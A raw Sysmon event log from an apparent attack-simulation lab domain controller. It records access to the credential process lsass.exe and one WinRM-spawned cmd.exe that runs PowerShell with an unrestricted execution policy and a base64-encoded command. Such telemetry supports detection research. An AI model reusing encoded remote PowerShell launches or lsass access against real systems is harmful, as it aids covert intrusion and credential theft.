08:40:23.508{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1677-5F84-F702-000000007E01}43642676C:\Windows\system32\conhost.exe{5D479F2C-1677-5F84-F802-000000007E01}5112C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-1677-5F84-F802-000000007E01}5112C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1677-5F84-F602-000000007E01}13244120C:\Windows\system32\WinrsHost.exe{5D479F2C-1677-5F84-F802-000000007E01}5112C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.506{5D479F2C-1677-5F84-F802-000000007E01}5112C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1677-5F84-B55C-110000000000}0x115cb50HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-1677-5F84-F602-000000007E01}1324C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.493{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.493{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.493{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.493{5D479F2C-1507-5F84-1300-000000007E01}13082496C:\Windows\system32\svchost.exe{5D479F2C-1677-5F84-F602-000000007E01}1324C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.477{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1677-5F84-F602-000000007E01}1324C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.477{5D479F2C-1677-5F84-F702-000000007E01}43642676C:\Windows\system32\conhost.exe{5D479F2C-1677-5F84-F602-000000007E01}1324C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-1677-5F84-F702-000000007E01}4364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 